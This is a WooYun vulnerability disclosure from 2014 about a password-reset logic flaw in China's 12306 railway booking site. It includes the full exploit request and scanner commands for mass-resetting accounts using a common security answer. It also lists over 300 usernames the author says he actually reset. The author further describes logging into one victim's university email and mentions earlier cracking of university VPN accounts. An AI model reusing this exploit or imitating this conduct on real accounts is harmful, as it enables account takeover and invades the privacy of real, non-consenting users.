
Vulnerability summary

Defect ID: wooyun-2014-063813

Title: Demonstration of a bulk password-reset flaw in 12306 (multiple users' passwords can be changed)

Vendor: 中国铁道科学研究院 (China Academy of Railway Sciences)

Author: lijiejie

Submitted: 2014-06-06 21:13

Fixed: 2014-06-11 14:41

Published: 2014-06-11 14:41

Vulnerability type: design flaw / logic error

Severity: high

Self-assessed Rank: 16

Status: fixed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-06-06: Details sent to the vendor, awaiting vendor response
2014-06-09: Vendor confirmed; details visible to vendor only
2014-06-11: Vendor fixed the issue and published it voluntarily; details disclosed to the public

Brief description:

The report I submitted to 12306 earlier was ignored: http://www.wooyun.org/bugs/wooyun-2014-063025, so I'll just walk through the exploitation in detail...

Detailed description:

Before starting, ping kyfw.12306.cn and pin the resolved IP in your hosts file. The site sits behind a load balancer (the BIGipServerotn cookie in the request below is an F5 persistence cookie), and pinning keeps every request of the sweep on the same backend node, so the captured session and the captcha bound to it stay valid.
POST:

POST /otn/forgetPassword/findPasswordByPromptAnswer HTTP/1.1
Host: kyfw.12306.cn
Connection: keep-alive
Content-Length: 228
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://kyfw.12306.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://kyfw.12306.cn/otn/forgetPassword/initforgetMyPassword
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=0A1E82A1441AF4843295A39FF9A11E51; BIGipServerotn=2362704138.38945.0000
userDTO.loginUserDTO.user_name=anfeng&userDTO.pwd_question=%E6%82%A8%E7%9A%84%E5%87%BA%E7%94%9F%E5%9C%B0%E6%98%AF%EF%BC%9F&userDTO.pwd_answer=%E4%B8%8A%E6%B5%B7&userDTO.password_new=test123&confirmPassWord=test123&randCodes=u6hc


In the body, userDTO.pwd_question decodes to 您的出生地是？ ("What is your birthplace?") and userDTO.pwd_answer to 上海 (Shanghai), a very common answer; only userDTO.loginUserDTO.user_name is varied. Substitute your own JSESSIONID and randCodes (captcha) values. Note that the same session and captcha value are reused for every request of the sweep, so the captcha was not being invalidated after use, and nothing limited the number of attempts per account.
Download my script (http://www.lijiejie.com/htpwdscan-http-weakpass-scanner/) and run the following, one after the other:

htpwdScan.py -f=post12306.txt -https -d userDTO.loginUserDTO.user_name=pinyin2.txt -err=existError\":\"Y -debug


htpwdScan.py -f=post12306.txt -https -d userDTO.loginUserDTO.user_name=C:/cygwin/home/pinyin2.txt -err=existError\":\"Y -o=12306.txt


12306.txt then lists the users whose password has been changed to test123 (a response containing existError":"Y is treated as a failed attempt; any other response counts as a hit).
The answer parameter in the request above can be driven from its own dictionary as well.

Proof of concept:

The passwords of all the accounts below have been changed to test123; don't believe me? Try a few.

aidong
anfeng
banbing
bangka
baoquan
bianfang
binger
caituo
caizhi
caorun
chaifang
changyan
chaoang
chaowei
chendiu
chenning
chensi
chengna
chonglai
chuaizhuo
chuandan
conghua
cuanzheng
cuixing
cuizhou
daidong
dequan
dengyang
diexian
douniang
dugong
duangang
dunpai
fanlei
feigeng
douzhuo
gainai
gaishu
gangqin
gening
geixiao
genneng
gongnei
guainian
guaizhe
guanshuang
guangpin
nuanxiao
paizhang
pangai
panlei
pangai
pangshe
paogao
peizhi
pinsan
qianduan
qieshuang
qingneng
qiujing
quliang
quemei
quexin
qundao
ranjing
renmin
rilang
rongzhai
rouran
ruanlei
ruannan
sanshou
shaleng
shaiyan
shangdao
shangji
shaohong
shenping
shenshuo
shigun
shijia
shijing
shudun
shuxin
shuagun
shunshai
songan
suibian
sunjin
sunjing
suogua
tangxiong
tianma
tingleng
tongdian
tuibian
tuirong
waizhan
wanchen
wangrong
weinei
wenlan
xianglong
xiaofei
xiaoqin
xiaosa
xiaosong
xiechong
xinggu
xingzang
xiongfang
xiongkai
xiupao
xiuzuo
xuanli
xunxun
yajing
yanchen
yangsa
yaoyun
yilang
yinmei
youhang
yuangeng
yueyong
zancheng
zangnuo
zaoling
zhaili
zhaizang
zhaokuan
zhaoying
zhengeng
zhengjin
zhipian
zhongshui
zhubiao
zhuyuan
zhuawo
zhuaichu
zhuanghong
zongcai
zongnuo
zouying
zuzheng
zuolou
zuosha
bantan
benqiao
biaoneng
binqian
bingdui
bochui
boqing
cangjia
chajie
chaqin
chanxun
chefeng
chenyin
chengfu
chengliu
chixiang
chulia
chuping
chuzhuang
chuangchu
cichan
ciling
cuiniao
daigang
daipin
danjin
danglei
deiseng
dengfu
dengzhou
dielao
diemei
dinglin
dinglu
dingpan
dingyue
duhuai
duming
duanzhao
duotuan
enseng
fanghai
feichen
fenghong
fenglei
foguang
fufang
gennie
guasan
guaiha
guanyue
haqing
haxiao
hanchui
hanghao
hangzhen
heiqia
hentong
hongtian
houbin
hujiong
huading
huangfang
huanglei
huangli
huogong
jiping
jiareng
jiangqiang
jiaochu
jiehua
jiepan
jieying
jinpie
jinren
jingchuan
jiongbai
jiongxu
juchai
juanfang
jueruan
kanmin
kangrun
kaoshi
kaosun
kaowen
kejian
kekong
kengshen
kuaiying
kuikai
kuipin
landie
lanmie
lanseng
laomai
leiqiu
leixia
lenghai
liamin
liaqiong
lianfu
linnei
liuzhang
loujue
luqing
lushen
maigang
mehuan
meiwang
mengun
mengbai
mengda
mengren
mieduan
mindong
naidao
nanlan
nanrong
nengniu
niaorong
nieling
ningde
nongzhang
nuoliang
oushou
paiyao
pangceng
pangniang
pangwu
pishen
pinqiao
qiahua
qianshu
qiaojiong
qinxun
qingsuo
qiongfa
qiongge
qiuran
quanjiao
quepeng
quetong
qunkang
rexuan
renqian
rengren
rongxu
rouzhou
ruanmin
ruoshun
shaqing
shazhong
shanhai
shanlian
shanshuang
shanxun
shaoyin
shendian
shennan
shensuan
shengjun
shihuan
shihua
shinei
shujiu
shuaxiong
shuima
shunjing
taikui
tenggang
tengyong
tizheng
tiewang
tongnuo
tongshan
tuixiu
tuoren
waichou
wanping
weihong
weishei
wensuo
woseng
xiashun
xiannian
xiantu
xiangma
xiaoling
xieming
xingzhong
yanyin
yaosang
yingcai
yinggong
yingnong
youmei
yunniu
yunpian
zaidou
zaijiao
zaoshen
zeifang
zeishui
zenning
zhashe
zhaozhong
zhegen
zhenzen
zhibang
zhihua
zhihao
zhuzhong
zhuachen
zhuangchun
zhuangye
zongjun
zongzong
zunkun


I picked an account at random to look at (I swear, it was random), and it turned out to be a Tsinghua email address. Logging into the mailbox with the phone number worked with no trouble at all, er... Since I had long ago cracked a number of Tsinghua and Peking University VPN accounts, there was no need to keep playing with Tsinghua.

[screenshot: 12306_info.png]


[screenshot: tsinghua_mail.png]


Suggested fix:

You're the experts.

Copyright notice: please credit lijiejie@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: low

Rank: 4

Confirmed: 2014-06-09 08:24

Vendor reply:

Thanks

Latest status:

2014-06-11: Fixed, thanks!